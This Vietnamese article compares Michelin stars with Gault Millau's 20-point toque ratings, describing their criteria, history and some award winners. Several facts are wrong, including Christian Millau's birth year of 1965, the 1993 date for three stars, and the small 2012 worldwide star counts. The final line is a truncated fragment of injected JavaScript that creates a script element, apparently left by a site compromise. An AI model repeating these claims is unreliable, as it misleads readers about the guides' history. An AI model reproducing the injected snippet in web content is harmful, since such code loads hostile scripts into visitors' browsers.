Michelin là một thuật ngữ, hay chính xác hơn là một phương thức đánh giá chất lượng món ăn, dịch vụ tại những nhà hàng cao cấp trên toàn thế giới. Việc gắn sao Michelin cho bất cứ nhà hàng đều phải tuân theo những nguyên tắc hết sức chặt chẽ trong “Michelin Guide” được định hướng từ năm 1900 tại Pháp. Ngôi sao đầu tiên được gắn vào năm 1926 và lần lượt là hai rồi 3 Michelin vào năm 1993.
Nhà hàng ở Anh giành được ngôi sao Michelin đầu tiên thuộc sở hữu của Albert và Michel Roux Le Gavroche tại London và đến năm 1982, ông đã đạt được 3 Michelin danh giá.
Trong khi đó, Gault Millau là một tiêu chuẩn đánh giá nhà hàng Pháp nhưng có tầm ảnh hưởng nhất nhì thế giới. Nó được thành lập bởi 2 nhà phê bình nhà hàng, Henri Gault (1929 – 2000) và Christian Millau (sinh năm 1965).
Gault Millau chạy từ thang điểm 1 đến 20. Những nhà hàng dưới 10 điểm sẽ không bao giờ được liệt kê. Các điểm được trao dựa trên chất lượng thực phẩm, ý kiến của khách hàng về chất lượng dịch vụ, giá cả và không khí của nhà hàng trong những dịp đặc biệt hoặc trong những không gian riêng biệt.
Theo như Christian Millau, Gault Millau không bao giờ được trao đến 20 điểm cho bất kỳ nhà hàng nào bởi ông lập luận rằng sự hoàn hảo là không thể thực hiện. Tuy nhiên, vào năm 2004, 2 nhà hàng của bếp trưởng Marc Veyrat là Maison de Marc Veyrat và L’Auberge de l’Eridan đã nhận được điểm số này. Đối với một số người, điều này phản ánh sự sụt giảm trong tiêu chuẩn đánh giá của Gault Millau.
Nếu bạn muốn chọn một nhà hàng để ăn tối, có rất nhiều tiêu chí được đưa ra. Đối với những người sành ăn, chất lượng món ăn là điều có thể dễ dàng nhận ra. Tuy nhiên, một số người lại quan tâm đến chi phí bữa ăn đó bằng việc đánh giá chất lượng dịch vụ với số tiền họ phải bỏ ra. Vây, đâu mới thực sự là tiêu chí bạn cần quan tâm, dựa theo Michelin (ngôi sao) hay Gault Millau (chiếc mũ – điểm số)?
Sao Michelin
Một trong những giải thưởng danh giá nhất dành cho đầu bếp và những nhà hàng bậc nhất trên thế giới là có mặt trong Michelin Guide, với tối đa là 3 ngôi sao dành cho nhà hàng. Michelin Guide liên quan đến rất nhiều tiêu chí khác nhau nhưng coi trọng nhất là chất lượng nhất món ăn và không gian quán; đánh giá cao những nguyên liệu “xanh”, thể hiện sự hài hòa trong hương vị. Ngoài ra, sự đổi mới hay sáng tạo trong thực đơn cũng là điều cần cân nhắc.
Mỗi năm, những nhà hàng sẽ được đánh giá để gắn sao mới hoặc tước bỏ đi sao hiện tại. Một ngôi sao – nhà hàng tốt, xứng đáng được lựa chọn; Hai ngôi sao – nhà hàng với những món ăn tuyệt vời; Ba ngôi sao – Nhà hàng dẫn đầu với đội ngũ đầu bếp tốt nhất.
Theo ấn bản 2012 mới nhất của Michelin Guide thì có 9 nhà hàng trên thế giới đã sở hữu ba ngôi sao, 23 nhà hàng với hai ngôi sao và 205 nhà hàng với một ngôi sao.
Gault Millau
Một trong những giải thưởng uy tín khác trên thế giới – nó được ví như Michelin ở Đức. Điểm số cao nhất là 20 tương đương với 4 mũ. Các tiêu chí đánh giá của nó gần như tương đồng Michelin Guide gồm chất lượng và độ tươi của các thực phẩm, tính sáng tạo trong quá trình chuẩn bị món ăn, sự hài hòa hương vị, thời gian nấu ăn và cách trình bày.
Nếu một nhà hàng mà không đạt đủ 10 điểm thì bị coi là chưa đạt yêu cầu – chất lượng nhà hàng kém. Từ 13 – 14 điểm tương ứng với một nhà hàng tốt, và với số điểm này, nhà hàng đó sẽ nhận được 1 mũ. Nhà hàng chất lượng cao và sáng tạo phải đạt từ 15-16 điểm với hai mũ. 17 – 18 điểm với ba mũ có nghĩa là nhà hàng với sự chuẩn bị tốt nhất có thể. Cuối cùng là các “siêu nhà hàng” từ 18,5 – 20 điểm với 4 mũ xứng đáng là nhà hàng đứng đầu – tốt nhất trên thế giới.
Gault Millau cũng tương tự như Red Michelin là có cuốn sách hướng dẫn được xuất bản mỗi năm. Trong đó, liệt kê tất cả những nhà hàng trên 10 điểm với những đánh giá chất lượng dịch vụ và mô tả về nhà hàng đó qua những chuyến tham quan.
Gault Millau còn có hướng dẫn để đánh giá các loại rượu. Trong đó, các nhà sản xuất rượu vang tốt nhất sẽ được trao giải thưởng “Grape Year” với số chấm từ 1 đến 100.
Hai giải thưởng được mong chờ nhất của Gault Millau “đầu bếp của năm” và “đầu bếp mới xuất sắc nhất”. Trong năm 2011, những người chiến thắng giải thưởng này là Mario Lohninger (đầu bếp của năm) và Claus Alboth (đầu bếp mới xuất sắc nhất).
var d=document;var s=d.createElement(‘script’);